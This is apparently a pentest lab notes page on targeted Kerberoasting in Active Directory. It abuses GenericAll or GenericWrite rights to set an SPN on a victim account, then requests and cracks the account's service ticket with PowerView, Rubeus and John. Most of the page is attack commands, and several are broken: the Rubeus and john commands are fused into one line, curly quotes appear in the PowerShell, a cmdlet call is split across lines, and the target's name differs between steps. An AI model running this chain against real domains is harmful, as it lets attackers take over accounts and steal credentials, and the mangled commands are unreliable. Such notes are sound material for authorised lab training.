# Set SPN

This abuse can be carried out when controlling an object that has a `GenericAll`, `GenericWrite`, `WriteProperty` or `Validated-SPN` over the target. A member of the Account Operator group usually has those permissions.

The attacker can add an SPN (`ServicePrincipalName`) to that account. Once the account has an SPN, it becomes vulnerable to Kerberoasting.

### Targeted Kerberoasting - Set SPN

* With GenericAll or GenericWrite, a target user's SPN can be set to anything that is unique in the forest.
* We can request a TGS without special privilges. The TGS can be Kerberoasted.

Enumerate permissions for RDPUsers on ACLs using PowerView:

{% code overflow="wrap" %}

```powershell
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
```

{% endcode %}

Check if the user already has a SPN set:

{% code overflow="wrap" %}

```powershell
# Powerview
Get-DomainUser -Identity supportuser | select serviceprincipalname

# AD module
Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName
```

{% endcode %}

Set SPN for the user

{% code overflow="wrap" %}

```powershell
# Powerview
Set-DomainObject -Identity support1user -Set @{serviceprincipalname=‘dcorp/whatever1'}

# AD module
Set-ADUser -Identity support1user -ServicePrincipalNames
@{Add=‘dcorp/whatever1'}
```

{% endcode %}

Kerberoast the user:

{% code overflow="wrap" %}

```powershell
Rubeus.exe kerberoast /outfile:targetedhashes.txt john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txt
```

{% endcode %}